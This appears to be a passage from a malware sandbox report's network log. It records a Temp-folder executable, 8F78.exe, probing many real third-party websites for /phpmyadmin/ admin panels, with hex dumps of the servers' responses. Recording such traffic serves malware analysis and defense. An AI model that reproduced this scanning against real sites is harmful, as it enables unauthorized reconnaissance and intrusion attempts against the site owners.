                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Content-Length: 232
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://kanapy.sk/eshop/
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC232INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://kanapy.sk/eshop/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                46192.168.2.45357435.190.10.694435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: ericrothphoto.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC203INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: /phpmyadmin
                                                                                                                                                                                                                                                                                                                                X-Request-Id: e4f25dd09fb511ee8a3205bc1a618d21
                                                                                                                                                                                                                                                                                                                                Server: None
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                47192.168.2.45359589.46.109.204435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: emmetisportfun.it
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC257INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: aruba-proxy
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://www.emmetisportfun.it/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                X-ServerName: ipvsproxy175.ad.aruba.it
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC179INData Raw: 61 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 72 75 62 61 2d 70 72 6f 78 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: a8<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>aruba-proxy</center></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                48192.168.2.45379786.107.32.1304435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: elteconline.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC363INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                X-UA-Compatible: IE=edge
                                                                                                                                                                                                                                                                                                                                Expires: Thu, 21 Dec 2023 05:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                Location: https://www.elteconline.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                49192.168.2.453557187.45.195.1384435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: erikamoveis.com.br
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC180INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/5.2.17
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                50192.168.2.45380889.46.109.204435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: emmetisportfun.it
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC257INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: aruba-proxy
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://www.emmetisportfun.it/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                X-ServerName: ipvsproxy175.ad.aruba.it
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC179INData Raw: 61 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 72 75 62 61 2d 70 72 6f 78 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: a8<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>aruba-proxy</center></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                51192.168.2.45382893.185.102.2244435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: roland-sk.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC198INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://profisign-sk.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                52192.168.2.45382686.107.32.1304435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: elteconline.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC363INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                X-UA-Compatible: IE=edge
                                                                                                                                                                                                                                                                                                                                Expires: Thu, 21 Dec 2023 05:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                Location: https://www.elteconline.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                53192.168.2.45380993.185.102.2244435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: roland-sk.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC198INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://profisign-sk.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                54192.168.2.45390835.190.10.694435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: ericrothphoto.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC203INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: /phpmyadmin
                                                                                                                                                                                                                                                                                                                                X-Request-Id: e527c5b09fb511eea9462d3488118bee
                                                                                                                                                                                                                                                                                                                                Server: None
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                55192.168.2.45379293.184.77.214435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: nakupusa.cz
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC187INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Length: 209
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC209INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                56192.168.2.45379393.184.77.214435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: nakupusa.cz
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC187INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Length: 209
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC209INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                57192.168.2.453560157.205.193.1254435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: magokorokan.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC422INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                Link: <https://magokorokan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                                                                                                X-FRAME-OPTIONS: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC6INData Raw: 32 32 36 34 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 2264
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC4217INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 2d 20 e5 8d 83 e8
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, user-scalable=yes, maximum-scale=1.0, minimum-scale=1.0"><meta name="description" content=" -
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC4587INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 6d 61 67 6f 6b 6f 72 6f 6b 61 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6d 65 74 65 6f 72 2d 73 6c 69 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 79 63 6c 65 2e 61 6c 6c 2e 6a 73 3f 76 65 72 3d 35 2e 30 2e 32 30 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 6d 61 67 6f 6b 6f 72 6f 6b 61 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6d 65 74 65 6f 72 2d 73 6c 69 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 65 74 61 64 61 74 61 2e 76 32 2e 6a 73
                                                                                                                                                                                                                                                                                                                                Data Ascii: <script type='text/javascript' src='https://magokorokan.com/wp-content/plugins/meteor-slides/js/jquery.cycle.all.js?ver=5.0.20'></script><script type='text/javascript' src='https://magokorokan.com/wp-content/plugins/meteor-slides/js/jquery.metadata.v2.js
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC6INData Raw: 31 35 31 34 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 1514
